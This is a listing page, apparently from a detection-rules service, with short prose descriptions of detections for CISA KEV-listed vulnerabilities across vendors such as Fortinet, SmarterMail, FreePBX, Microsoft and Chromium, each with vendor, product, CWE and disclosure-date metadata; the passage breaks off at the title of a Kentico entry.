Detects exploitation of CVE-2025-11953, an OS command injection vulnerability (CWE-78) in the React Native Community CLI. An attacker who can influence arguments or configuration consumed by the React Native CLI can inject arbitrary OS commands that execute with the privileges of the developer or CI/CD process invoking the CLI. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: React Native Community product: CLI cwe: CWE-78 disclosed: Feb 5, 2026unscoredwrite-up soon - CVE-2026-24423 KEV
SmarterMail Missing Authentication for Critical Function (CVE-2026-24423)
Detects exploitation of CVE-2026-24423, a missing authentication vulnerability (CWE-306) in SmarterTools SmarterMail. This KEV-listed vulnerability allows unauthenticated attackers to access critical functions in SmarterMail, potentially enabling unauthorized administrative access, data exfiltration, or further lateral movement. Detection focuses on unauthenticated access patterns to administrative and critical API endpoints.
vendor: SmarterTools product: SmarterMail cwe: CWE-306 disclosed: Feb 5, 2026unscoredwrite-up soon - CVE-2019-19006 KEV
Sangoma FreePBX Remote Admin Authentication Bypass (CVE-2019-19006)
CVE-2019-19006 is an improper authentication vulnerability (CWE-287) in Sangoma FreePBX that allows remote unauthenticated attackers to bypass administrative authentication controls. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation grants attackers full administrative access to the FreePBX VoIP management interface, enabling call interception, configuration tampering, toll fraud, and potential lateral movement into the broader network.
vendor: Sangoma product: FreePBX cwe: CWE-287 disclosed: Feb 3, 2026unscoredwrite-up soon - CVE-2021-39935 KEV
GitLab SSRF via Import Feature (CVE-2021-39935)
CVE-2021-39935 is a Server-Side Request Forgery (SSRF) vulnerability in GitLab Community and Enterprise Editions. An attacker can abuse GitLab's project import or integration features to cause the server to issue arbitrary HTTP requests to internal network resources, enabling reconnaissance, metadata service access, and potential lateral movement within cloud-hosted or on-premises GitLab deployments. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: GitLab product: Community and Enterprise Editions cwe: CWE-918 disclosed: Feb 3, 2026unscoredwrite-up soon - CVE-2025-40551 KEV
CVE-2025-40551 — SolarWinds Web Help Desk Deserialization RCE
Detects exploitation of CVE-2025-40551, a deserialization of untrusted data vulnerability in SolarWinds Web Help Desk. Successful exploitation allows unauthenticated or low-privileged attackers to achieve remote code execution on the WHD server. This CVE is listed in CISA KEV, indicating active exploitation in the wild.
vendor: SolarWinds product: Web Help Desk cwe: CWE-502 disclosed: Feb 3, 2026unscoredwrite-up soon - CVE-2025-64328 KEV
Sangoma FreePBX OS Command Injection (CVE-2025-64328)
Detects exploitation of an OS command injection vulnerability in Sangoma FreePBX. An authenticated or unauthenticated attacker may inject arbitrary OS commands through vulnerable FreePBX web interfaces or API endpoints, leading to remote code execution on the underlying Linux host. This vulnerability is tracked as CVE-2025-64328 and is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Sangoma product: FreePBX cwe: CWE-78 disclosed: Feb 3, 2026unscoredwrite-up soon - CVE-2026-1281 KEV
CVE-2026-1281 — Ivanti EPMM Code Injection Exploitation
Detects exploitation of CVE-2026-1281, a code injection vulnerability (CWE-94) in Ivanti Endpoint Manager Mobile (EPMM). This KEV-listed vulnerability allows remote attackers to inject and execute arbitrary code via the EPMM management interface. Detection focuses on anomalous process execution, suspicious web shell activity, and unexpected outbound connections from EPMM server infrastructure.
vendor: Ivanti product: Endpoint Manager Mobile (EPMM) cwe: CWE-94 disclosed: Jan 29, 2026unscoredwrite-up soon - CVE-2026-24858 KEV
Fortinet Multiple Products Authentication Bypass via Alternate Path or Channel (CVE-2026-24858)
Detects exploitation of CVE-2026-24858, an authentication bypass vulnerability (CWE-288) affecting multiple Fortinet products. Attackers abuse an alternate authentication path or channel — specifically SSO abuse on FortiOS — to bypass normal authentication controls and gain unauthorized access. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: Fortinet product: Multiple Products cwe: CWE-288 disclosed: Jan 27, 2026unscoredwrite-up soon - CVE-2018-14634 KEV
Linux Kernel Integer Overflow in create_elf_tables (CVE-2018-14634)
CVE-2018-14634 is an integer overflow vulnerability in the Linux kernel's create_elf_tables() function, triggered during process execution via the execve syscall. A local unprivileged attacker can exploit this flaw to achieve privilege escalation to root by crafting a binary with an extremely large argument list. This vulnerability exists in Linux kernel versions 2.6.x through 4.14.x and is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Linux product: Kernel cwe: CWE-190 disclosed: Jan 26, 2026unscoredwrite-up soon - CVE-2025-52691 KEV
SmarterMail Unrestricted File Upload Exploitation (CVE-2025-52691)
Detects exploitation of CVE-2025-52691, an unrestricted file upload vulnerability in SmarterTools SmarterMail. This vulnerability allows attackers to upload files with dangerous types (e.g., web shells, executables) to the mail server, potentially enabling remote code execution. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: SmarterTools product: SmarterMail cwe: CWE-434 disclosed: Jan 26, 2026unscoredwrite-up soon - CVE-2026-21509 KEV
Microsoft Office Security Feature Bypass (CVE-2026-21509)
Detects exploitation of CVE-2026-21509, a security feature bypass vulnerability in Microsoft Office classified under CWE-807 (Reliance on Untrusted Inputs in a Security Decision). This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to bypass security controls within Office applications, potentially enabling malicious document execution without expected security warnings or Protected View enforcement.
vendor: Microsoft product: Office cwe: CWE-807 disclosed: Jan 26, 2026unscoredwrite-up soon - CVE-2026-23760 KEV
SmarterMail Authentication Bypass via Alternate Path or Channel (CVE-2026-23760)
Detects exploitation of CVE-2026-23760, an authentication bypass vulnerability (CWE-288) in SmarterTools SmarterMail. Attackers can access protected functionality through an alternate path or channel without valid credentials, potentially leading to unauthorized mailbox access, data exfiltration, or lateral movement. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: SmarterTools product: SmarterMail cwe: CWE-288 disclosed: Jan 26, 2026unscoredwrite-up soon - CVE-2026-24061 KEV
GNU InetUtils Argument Injection Vulnerability (CVE-2026-24061)
CVE-2026-24061 is an argument injection vulnerability (CWE-88) in GNU InetUtils affecting utilities such as telnet, ftp, rsh, rcp, and related tools. An attacker who can control arguments passed to InetUtils binaries may inject additional command-line options, potentially enabling unauthorized network access, privilege escalation, or lateral movement. This vulnerability is listed on the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: GNU product: InetUtils cwe: CWE-88 disclosed: Jan 26, 2026unscoredwrite-up soon - CVE-2024-37079 KEV
VMware vCenter Server Out-of-bounds Write (CVE-2024-37079)
Detects exploitation attempts targeting CVE-2024-37079, an out-of-bounds write vulnerability (CWE-787) in Broadcom VMware vCenter Server. This KEV-listed vulnerability allows unauthenticated remote attackers to trigger memory corruption via malformed DCERPC requests to the vCenter management interface, potentially leading to remote code execution with SYSTEM-level privileges on the vCenter appliance.
vendor: Broadcom product: VMware vCenter Server cwe: CWE-787 disclosed: Jan 23, 2026unscoredwrite-up soon - CVE-2025-31125 KEV
CVE-2025-31125: Vite Dev Server Improper Access Control
Detects exploitation of CVE-2025-31125, an improper access control vulnerability in Vite (Vitejs) dev server. The vulnerability allows unauthorized access to sensitive files outside the intended serve root, classified under CWE-200 (Information Exposure) and CWE-284 (Improper Access Control). This vulnerability is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Vite product: Vitejs cwe: CWE-200, CWE-284 disclosed: Jan 22, 2026unscoredwrite-up soon - CVE-2025-34026 KEV
Versa Concerto Improper Authentication (CVE-2025-34026)
Detects exploitation attempts targeting CVE-2025-34026, an improper authentication vulnerability (CWE-288) in Versa Concerto SD-WAN orchestration platform. This vulnerability allows attackers to bypass authentication controls, potentially enabling unauthorized access to the Concerto management interface. Listed as a CISA KEV, indicating active exploitation in the wild.
vendor: Versa product: Concerto cwe: CWE-288 disclosed: Jan 22, 2026unscoredwrite-up soon - CVE-2025-54313 KEV
Prettier eslint-config-prettier Embedded Malicious Code (CVE-2025-54313)
Detects exploitation indicators related to CVE-2025-54313, a supply chain compromise affecting the eslint-config-prettier npm package (Prettier). The package was trojanized with embedded malicious code (CWE-506), enabling arbitrary code execution during npm install or build processes. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Prettier product: eslint-config-prettier cwe: CWE-506 disclosed: Jan 22, 2026unscoredwrite-up soon - CVE-2025-68645 KEV
Synacor Zimbra Collaboration Suite PHP Remote File Inclusion (CVE-2025-68645)
Detects exploitation of CVE-2025-68645, a PHP Remote File Inclusion (RFI) vulnerability in Synacor Zimbra Collaboration Suite (ZCS). CWE-98 class vulnerabilities allow attackers to inject and execute remote PHP files via unsanitized user-controlled input passed to PHP file inclusion functions, enabling arbitrary code execution in the context of the web server process. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
vendor: Synacor product: Zimbra Collaboration Suite (ZCS) cwe: CWE-98 disclosed: Jan 22, 2026unscoredwrite-up soon - CVE-2026-20045 KEV
CVE-2026-20045: Cisco Unified Communications Manager Code Injection
Detects exploitation attempts targeting CVE-2026-20045, a code injection vulnerability (CWE-94) in Cisco Unified Communications Manager. This KEV-listed vulnerability allows remote attackers to inject and execute arbitrary code. Detection focuses on anomalous process execution, unexpected web shell activity, and suspicious outbound connections originating from CUCM processes.
vendor: Cisco product: Unified Communications Manager cwe: CWE-94 disclosed: Jan 21, 2026unscoredwrite-up soon - CVE-2026-20805 KEV
Microsoft Windows Information Disclosure (CVE-2026-20805)
Detects exploitation of CVE-2026-20805, a Microsoft Windows information disclosure vulnerability (CWE-200) that allows attackers to access sensitive memory or kernel data. This vulnerability is actively exploited in the wild (CISA KEV). Successful exploitation may expose credentials, memory contents, or system information that enables privilege escalation or lateral movement.
vendor: Microsoft product: Windows cwe: CWE-200 disclosed: Jan 13, 2026unscoredwrite-up soon - CVE-2025-8110 KEV
Gogs Path Traversal Vulnerability (CVE-2025-8110)
Detects exploitation attempts targeting CVE-2025-8110, a path traversal vulnerability (CWE-22) in Gogs self-hosted Git service. Attackers can craft malicious HTTP requests containing directory traversal sequences to read arbitrary files outside the intended web root, potentially exposing sensitive configuration files, SSH keys, or repository data. This vulnerability is listed in the CISA KEV catalog indicating active exploitation in the wild.
vendor: Gogs product: Gogs cwe: CWE-22 disclosed: Jan 12, 2026unscoredwrite-up soon - CVE-2009-0556 KEV
Microsoft Office PowerPoint Code Injection (CVE-2009-0556)
Detects exploitation attempts of CVE-2009-0556, a code injection vulnerability in Microsoft Office PowerPoint. Attackers can exploit this vulnerability via crafted PowerPoint files to execute arbitrary code in the context of the logged-in user. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Microsoft product: Office cwe: CWE-94 disclosed: Jan 7, 2026unscoredwrite-up soon - CVE-2025-37164 KEV
HPE OneView Code Injection Exploitation (CVE-2025-37164)
Detects exploitation of CVE-2025-37164, a code injection vulnerability (CWE-94) in Hewlett Packard Enterprise OneView. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog and allows attackers to inject and execute arbitrary code through the OneView management platform, potentially compromising datacenter infrastructure management.
vendor: Hewlett Packard Enterprise (HPE) product: OneView cwe: CWE-94 disclosed: Jan 7, 2026unscoredwrite-up soon - CVE-2025-14847 KEV
MongoDB Improper Handling of Length Parameter Inconsistency (CVE-2025-14847)
Detects exploitation attempts targeting CVE-2025-14847, an improper handling of length parameter inconsistency vulnerability (CWE-130) in MongoDB and MongoDB Server. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may craft malformed requests with inconsistent length parameters to cause unexpected server behavior, potentially leading to denial of service, data corruption, or unauthorized access.
vendor: MongoDB product: MongoDB and MongoDB Server cwe: CWE-130 disclosed: Dec 29, 2025unscoredwrite-up soon - CVE-2023-52163 KEV
Digiever DS-2105 Pro Missing Authorization Exploitation (CVE-2023-52163)
Detects exploitation of CVE-2023-52163, a missing authorization vulnerability (CWE-862) in Digiever DS-2105 Pro NVR devices. This KEV-listed vulnerability allows unauthenticated attackers to access restricted functionality or administrative interfaces without proper credential validation. Threat actors actively exploit exposed NVR devices for initial access, lateral movement, and persistence in OT/IoT environments.
vendor: Digiever product: DS-2105 Pro cwe: CWE-862 disclosed: Dec 22, 2025unscoredwrite-up soon - CVE-2025-14733 KEV
CVE-2025-14733: WatchGuard Firebox Out-of-Bounds Write Exploitation
Detects exploitation attempts targeting CVE-2025-14733, an out-of-bounds write vulnerability (CWE-787) in WatchGuard Firebox devices. This vulnerability is actively exploited in the wild (CISA KEV) and may allow remote code execution or device compromise. Detection focuses on anomalous management interface activity, unexpected process crashes, and network indicators consistent with exploitation.
vendor: WatchGuard product: Firebox cwe: CWE-787 disclosed: Dec 19, 2025unscoredwrite-up soon - CVE-2025-20393 KEV
CVE-2025-20393 — Cisco Multiple Products Improper Input Validation (KEV)
Detects exploitation attempts targeting CVE-2025-20393, an improper input validation vulnerability (CWE-20) affecting Cisco Multiple Products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active in-the-wild exploitation. Attackers may leverage this flaw to bypass security controls, execute unauthorized commands, or gain elevated access to affected Cisco appliances.
vendor: Cisco product: Multiple Products cwe: CWE-20 disclosed: Dec 17, 2025unscoredwrite-up soon - CVE-2025-40602 KEV
CVE-2025-40602 - SonicWall SMA1000 Missing Authorization Exploitation
Detects exploitation attempts targeting CVE-2025-40602, a missing authorization vulnerability (CWE-862) combined with execution with unnecessary privileges (CWE-250) in SonicWall SMA1000 appliances. This KEV-listed vulnerability allows unauthenticated or insufficiently privileged attackers to access restricted resources or execute privileged operations. Detection focuses on anomalous HTTP requests to SMA1000 management interfaces, unexpected authentication bypass patterns, and post-exploitation activity indicative of privilege escalation on SMA gateway infrastructure.
vendor: SonicWall product: SMA1000 appliance cwe: CWE-862, CWE-250 disclosed: Dec 17, 2025unscoredwrite-up soon - CVE-2025-59374 KEV
ASUS Live Update Embedded Malicious Code (CVE-2025-59374)
Detects indicators of compromise related to CVE-2025-59374, a supply chain attack where ASUS Live Update software contained embedded malicious code (CWE-506). This mirrors the ShadowHammer operation pattern where threat actors compromised the ASUS software update infrastructure to deliver backdoored updates to endpoints. Detection focuses on suspicious child processes spawned by ASUS Live Update, anomalous network connections, and staging activity consistent with backdoor execution.
vendor: ASUS product: Live Update cwe: CWE-506 disclosed: Dec 17, 2025unscoredwrite-up soon - CVE-2025-59718 KEV
Fortinet Multiple Products Improper Verification of Cryptographic Signature (CVE-2025-59718)
Detects exploitation of CVE-2025-59718, an improper verification of cryptographic signature vulnerability (CWE-347) affecting multiple Fortinet products. This vulnerability, listed in CISA's Known Exploited Vulnerabilities catalog, allows attackers to bypass signature validation checks, potentially enabling unsigned firmware/software installation, man-in-the-middle attacks on update channels, or code execution with elevated privileges on affected Fortinet appliances.
vendor: Fortinet product: Multiple Products cwe: CWE-347 disclosed: Dec 16, 2025unscoredwrite-up soon - CVE-2025-14611 KEV
Gladinet CentreStack and Triofox Hard-Coded Cryptographic Key Exploitation
Detects exploitation of CVE-2025-14611, a hard-coded cryptographic key vulnerability (CWE-798) in Gladinet CentreStack and Triofox. Attackers who obtain the static machineKey or cryptographic seed can forge ASP.NET ViewState tokens or authentication artifacts, enabling remote code execution via deserialization attacks without valid credentials. This vulnerability is actively exploited and listed on CISA KEV.
vendor: Gladinet product: CentreStack and Triofox cwe: CWE-798 disclosed: Dec 15, 2025unscoredwrite-up soon - CVE-2025-43529 KEV
Apple WebKit Use-After-Free Exploitation Attempt (CVE-2025-43529)
Detects exploitation attempts targeting CVE-2025-43529, a use-after-free vulnerability in Apple's WebKit browser engine affecting multiple Apple products. This vulnerability is actively exploited in the wild (CISA KEV) and can lead to arbitrary code execution when a user visits a maliciously crafted webpage. Attackers may leverage this flaw to achieve initial access or privilege escalation on macOS, iOS, and iPadOS devices.
vendor: Apple product: Multiple Products cwe: CWE-416 disclosed: Dec 15, 2025unscoredwrite-up soon - CVE-2018-4063 KEV
Sierra Wireless AirLink ALEOS Unrestricted File Upload Exploitation
Detects exploitation of CVE-2018-4063, an unrestricted file upload vulnerability (CWE-434) in Sierra Wireless AirLink ALEOS firmware. Attackers can upload files with dangerous types via the ACEmanager web interface, enabling remote code execution on cellular gateway devices. This vulnerability is listed in CISA KEV and has been exploited in the wild against critical infrastructure.
vendor: Sierra Wireless product: AirLink ALEOS cwe: CWE-434 disclosed: Dec 12, 2025unscoredwrite-up soon - CVE-2025-14174 KEV
CVE-2025-14174: Google Chromium Out of Bounds Memory Access Exploitation
Detects exploitation of CVE-2025-14174, an out-of-bounds memory access vulnerability in Google Chromium. This vulnerability is actively exploited in the wild (CISA KEV) and can allow attackers to execute arbitrary code or escape the browser sandbox via a crafted web page. Detection focuses on abnormal Chromium process behavior including child process spawning, memory anomalies, and post-exploitation indicators.
vendor: Google product: Chromium disclosed: Dec 12, 2025unscoredwrite-up soon - CVE-2025-58360 KEV
OSGeo GeoServer XXE Injection Exploitation Attempt
Detects exploitation attempts targeting CVE-2025-58360, an Improper Restriction of XML External Entity (XXE) Reference vulnerability in OSGeo GeoServer. Attackers can submit malicious XML payloads to GeoServer endpoints to perform server-side request forgery, read local files, or exfiltrate data via out-of-band DNS/HTTP channels. This CVE is listed on CISA's Known Exploited Vulnerabilities catalog.
vendor: OSGeo product: GeoServer cwe: CWE-611 disclosed: Dec 11, 2025unscoredwrite-up soon - CVE-2025-6218 KEV
CVE-2025-6218: RARLAB WinRAR Path Traversal Exploitation
Detects exploitation of CVE-2025-6218, a path traversal vulnerability in RARLAB WinRAR. Attackers can craft malicious archive files that, when extracted, write files outside the intended extraction directory, enabling arbitrary file placement on the victim system. This vulnerability is actively exploited in the wild (CISA KEV) and can lead to code execution, persistence, or privilege escalation by dropping malicious files to sensitive locations such as startup folders, system directories, or application data paths.
vendor: RARLAB product: WinRAR cwe: CWE-22 disclosed: Dec 9, 2025unscoredwrite-up soon - CVE-2025-62221 KEV
CVE-2025-62221 Microsoft Windows Use After Free Exploitation
Detects exploitation attempts of CVE-2025-62221, a use-after-free vulnerability in Microsoft Windows. This class of memory corruption flaw allows attackers to execute arbitrary code by manipulating freed memory objects. As a CISA KEV entry, active exploitation in the wild has been confirmed. Detection focuses on anomalous process behavior, kernel-mode memory corruption indicators, crash telemetry, and privilege escalation patterns consistent with UAF exploitation chains.
vendor: Microsoft product: Windows cwe: CWE-416 disclosed: Dec 9, 2025unscoredwrite-up soon - CVE-2022-37055 KEV
CVE-2022-37055 D-Link Router Buffer Overflow Exploitation
Detects exploitation attempts targeting CVE-2022-37055, a buffer overflow vulnerability (CWE-120) in D-Link routers. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may exploit this vulnerability to achieve remote code execution on affected D-Link routers, potentially enabling network pivoting, persistent access, or botnet enrollment.
vendor: D-Link product: Routers cwe: CWE-120 disclosed: Dec 8, 2025unscoredwrite-up soon - CVE-2025-66644 KEV
Array Networks ArrayOS AG OS Command Injection (CVE-2025-66644)
Detects exploitation of CVE-2025-66644, an OS command injection vulnerability in Array Networks ArrayOS AG. This vulnerability allows remote attackers to execute arbitrary operating system commands through the Array Networks SSL VPN/ZTNA gateway. The flaw is tracked by CISA as a Known Exploited Vulnerability (KEV), indicating active in-the-wild exploitation. Attackers may leverage this to gain initial access, establish persistence, or pivot laterally within the network.
vendor: Array Networks product: ArrayOS AG cwe: CWE-78 disclosed: Dec 8, 2025unscoredwrite-up soon - CVE-2025-55182 KEV
CVE-2025-55182 — Meta React Server Components Remote Code Execution
Detects exploitation of CVE-2025-55182, a critical remote code execution vulnerability in Meta React Server Components. This vulnerability allows attackers to achieve server-side code execution by abusing the React Server Components protocol, potentially leading to full server compromise. The vulnerability is actively exploited in the wild (CISA KEV).
vendor: Meta product: React Server Components disclosed: Dec 5, 2025unscoredwrite-up soon - CVE-2021-26828 KEV
CVE-2021-26828: OpenPLC ScadaBR Unrestricted File Upload RCE
Detects exploitation of CVE-2021-26828, an unrestricted file upload vulnerability in OpenPLC ScadaBR that allows authenticated attackers to upload files with dangerous types (e.g., JSP, PHP, WAR) to the server, leading to remote code execution. ScadaBR is a SCADA/HMI web application widely used in industrial control systems. This vulnerability is actively exploited in the wild and listed in CISA KEV.
vendor: OpenPLC product: ScadaBR cwe: CWE-434 disclosed: Dec 3, 2025unscoredwrite-up soon - CVE-2021-26829 KEV
OpenPLC ScadaBR Cross-Site Scripting (XSS) Exploitation Detected
Detects exploitation attempts targeting CVE-2021-26829, a stored or reflected cross-site scripting vulnerability in OpenPLC ScadaBR. ScadaBR is a SCADA/HMI platform used in industrial control environments. Successful exploitation allows attackers to inject malicious scripts into the web interface, potentially enabling session hijacking, credential theft, or lateral movement within OT/ICS environments. This CVE is listed on CISA's Known Exploited Vulnerabilities catalog.
vendor: OpenPLC product: ScadaBR cwe: CWE-79 disclosed: Nov 28, 2025unscoredwrite-up soon - CVE-2025-13223 KEV
Google Chromium V8 Type Confusion Exploitation (CVE-2025-13223)
Detects exploitation attempts targeting CVE-2025-13223, a type confusion vulnerability (CWE-843) in Google Chromium's V8 JavaScript engine. This KEV-listed vulnerability allows remote attackers to execute arbitrary code via a crafted HTML page. Exploitation typically involves a malicious web page triggering memory corruption through confused object type handling in V8, leading to sandbox escape or remote code execution within the browser process.
vendor: Google product: Chromium V8 cwe: CWE-843 disclosed: Nov 19, 2025unscoredwrite-up soon - CVE-2025-68670 Public PoC PoC
xrdp Unauthenticated Stack Buffer Overflow via RDP Connection Sequence
CVE-2025-68670 is a critical (CVSS 9.1) unauthenticated stack-based buffer overflow vulnerability in xrdp, the open-source RDP server widely deployed on Linux systems. The vulnerability stems from improper bounds checking when processing user domain information during the RDP connection sequence (pre-authentication). An unauthenticated remote attacker can overwrite the stack buffer and return address, potentially redirecting execution flow to execute arbitrary code. Fixed in xrdp v0.10.5. The impact is partially mitigated if the binary was compiled with stack canary protection, though the advisory warns against relying on this for production systems. xrdp is commonly used to provide RDP access to Ubuntu, Debian, CentOS, and other Linux servers — including cloud VMs, developer workstations, and Linux-based infrastructure in SMB environments. Exploitation requires no credentials and only network access to port 3389.
vendor: neutrinolabs, xrdp product: xrdp cwe: CWE-121 disclosed: Nov 18, 20259.1 criticalwrite-up soon - CVE-2025-58034 KEV
Fortinet FortiWeb OS Command Injection (CVE-2025-58034)
Detects exploitation of CVE-2025-58034, an OS command injection vulnerability (CWE-78) in Fortinet FortiWeb. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through FortiWeb's management or inspection interfaces, potentially leading to full appliance compromise, lateral movement, and persistent access to network segmentation points.
vendor: Fortinet product: FortiWeb cwe: CWE-78 disclosed: Nov 18, 2025unscoredwrite-up soon - CVE-2025-64446 KEV
CVE-2025-64446: Fortinet FortiWeb Path Traversal Exploitation
Detects exploitation attempts targeting CVE-2025-64446, a path traversal vulnerability (CWE-23) in Fortinet FortiWeb. This vulnerability allows attackers to traverse directory boundaries and access files outside the intended web root, potentially exposing sensitive configuration files, credentials, or system files. The vulnerability is listed in CISA KEV indicating active exploitation in the wild.
vendor: Fortinet product: FortiWeb cwe: CWE-23 disclosed: Nov 14, 2025unscoredwrite-up soon - CVE-2025-12480 KEV
Gladinet Triofox Improper Access Control Exploitation Detected
Detects exploitation attempts targeting CVE-2025-12480, an improper access control vulnerability (CWE-284) in Gladinet Triofox. This vulnerability allows attackers to bypass access controls, potentially gaining unauthorized access to file storage and collaboration resources. Listed as a CISA Known Exploited Vulnerability, active exploitation has been observed in the wild.
vendor: Gladinet product: Triofox cwe: CWE-284 disclosed: Nov 12, 2025unscoredwrite-up soon - CVE-2025-62215 KEV
CVE-2025-62215 Microsoft Windows Race Condition Exploitation
Detects exploitation attempts of CVE-2025-62215, a race condition vulnerability (CWE-362) in Microsoft Windows. This KEV-listed vulnerability can be abused by attackers to gain elevated privileges or execute arbitrary code by winning a time-of-check to time-of-use (TOCTOU) race condition. Detection focuses on suspicious process creation patterns, handle manipulation, and abnormal thread timing indicative of race condition exploitation.
vendor: Microsoft product: Windows cwe: CWE-362 disclosed: Nov 12, 2025unscoredwrite-up soon - CVE-2025-9242 KEV
WatchGuard Firebox Out-of-Bounds Write Exploitation (CVE-2025-9242)
Detects exploitation attempts targeting CVE-2025-9242, an out-of-bounds write vulnerability (CWE-787) in WatchGuard Firebox appliances. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation may allow remote code execution or denial of service on affected Firebox devices.
vendor: WatchGuard product: Firebox cwe: CWE-787 disclosed: Nov 12, 2025unscoredwrite-up soon - CVE-2025-11371 KEV
Gladinet CentreStack/Triofox Unauthorized File/Directory Access (CVE-2025-11371)
Detects exploitation of CVE-2025-11371, a CWE-552 vulnerability in Gladinet CentreStack and Triofox where files or directories are accessible to external parties without proper authorization. This CISA KEV-listed vulnerability allows unauthenticated or unauthorized actors to access sensitive files and directories exposed by the affected file-sharing platform.
vendor: Gladinet product: CentreStack and Triofox cwe: CWE-552 disclosed: Nov 4, 2025unscoredwrite-up soon - CVE-2025-48703 KEV
CVE-2025-48703 - CWP Control Web Panel OS Command Injection
Detects exploitation of CVE-2025-48703, an OS command injection vulnerability (CWE-78) in CWP Control Web Panel. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through the web panel interface, potentially leading to full server compromise.
vendor: CWP product: Control Web Panel cwe: CWE-78 disclosed: Nov 4, 2025unscoredwrite-up soon - CVE-2025-24893 KEV
CVE-2025-24893 XWiki Platform Eval Injection Exploitation
Detects exploitation of CVE-2025-24893, an eval injection vulnerability (CWE-95) in XWiki Platform that allows remote code execution via server-side template injection. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers can craft malicious wiki content or URLs containing Groovy/Velocity template expressions that are evaluated server-side, leading to arbitrary code execution under the XWiki process context.
vendor: XWiki product: Platform cwe: CWE-95 disclosed: Oct 30, 2025unscoredwrite-up soon - CVE-2025-41244 KEV
CVE-2025-41244 - VMware Aria Operations & VMware Tools Privilege Escalation via Unsafe Actions
Detects exploitation of CVE-2025-41244, a privilege escalation vulnerability in Broadcom VMware Aria Operations and VMware Tools caused by privileges defined with unsafe actions (CWE-267). This KEV-listed vulnerability allows attackers with lower-privileged access to escalate privileges by abusing overly permissive or unsafe role/action definitions within VMware Aria Operations or VMware Tools components. Indicators include anomalous administrative API calls, unexpected privilege changes in VMware management interfaces, and suspicious process activity from VMware Tools guest utilities.
vendor: Broadcom product: VMware Aria Operations and VMware Tools cwe: CWE-267 disclosed: Oct 30, 2025unscoredwrite-up soon - CVE-2025-6204 KEV
CVE-2025-6204 — Dassault Systèmes DELMIA Apriso Code Injection
Detects exploitation of CVE-2025-6204, a code injection vulnerability (CWE-94) in Dassault Systèmes DELMIA Apriso. This vulnerability allows attackers to inject and execute arbitrary code through the Apriso application layer. It is listed on CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation can lead to remote code execution, lateral movement, and full compromise of manufacturing execution system (MES) environments.
vendor: Dassault Systèmes product: DELMIA Apriso cwe: CWE-94 disclosed: Oct 28, 2025unscoredwrite-up soon - CVE-2025-6205 KEV
Dassault Systèmes DELMIA Apriso Missing Authorization (CVE-2025-6205)
Detects exploitation attempts targeting CVE-2025-6205, a missing authorization vulnerability (CWE-862) in Dassault Systèmes DELMIA Apriso. This vulnerability allows unauthenticated or low-privileged attackers to access protected resources or perform actions without proper authorization checks. Listed as a CISA KEV, indicating active exploitation in the wild.
vendor: Dassault Systèmes product: DELMIA Apriso cwe: CWE-862 disclosed: Oct 28, 2025unscoredwrite-up soon - CVE-2025-54236 KEV
Adobe Commerce / Magento Improper Input Validation (CVE-2025-54236)
Detects exploitation of CVE-2025-54236, an improper input validation vulnerability in Adobe Commerce and Magento. This KEV-listed vulnerability allows attackers to submit maliciously crafted input to Commerce/Magento endpoints, potentially leading to remote code execution, unauthorized data access, or store compromise. Detection focuses on anomalous HTTP request patterns to Magento/Commerce endpoints, unexpected PHP execution, and indicators of post-exploitation activity.
vendor: Adobe product: Commerce and Magento cwe: CWE-20 disclosed: Oct 24, 2025unscoredwrite-up soon - CVE-2025-59287 KEV
Microsoft WSUS Deserialization of Untrusted Data (CVE-2025-59287)
Detects exploitation of CVE-2025-59287, a deserialization of untrusted data vulnerability in Microsoft Windows Server Update Services (WSUS). Successful exploitation allows an attacker to execute arbitrary code in the context of the WSUS service by sending a crafted serialized object. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild.
vendor: Microsoft product: Windows cwe: CWE-502 disclosed: Oct 24, 2025unscoredwrite-up soon - CVE-2025-61932 KEV
Motex LANSCOPE Endpoint Manager - Improper Verification of Communication Channel Source (CVE-2025-61932)
CVE-2025-61932 is an Improper Verification of Source of a Communication Channel (CWE-940) vulnerability in Motex LANSCOPE Endpoint Manager. This flaw allows an attacker to send commands or data through a communication channel without proper verification of the channel's origin, potentially enabling unauthorized control over managed endpoints. The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may abuse this to impersonate the LANSCOPE management server and push malicious instructions to endpoint agents.
vendor: Motex product: LANSCOPE Endpoint Manager cwe: CWE-940 disclosed: Oct 22, 2025unscoredwrite-up soon - CVE-2022-48503 KEV
CVE-2022-48503 Apple Multiple Products Unspecified Vulnerability Exploitation
Detects potential exploitation of CVE-2022-48503, an unspecified vulnerability affecting Apple multiple products. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Detection focuses on suspicious process activity, network connections, and crash telemetry from Apple ecosystem processes that may indicate exploitation attempts.
vendor: Apple product: Multiple Products disclosed: Oct 20, 2025unscoredwrite-up soon - CVE-2025-2746 KEV
CVE-2025-2746: Kentico Xperience CMS Authentication Bypass
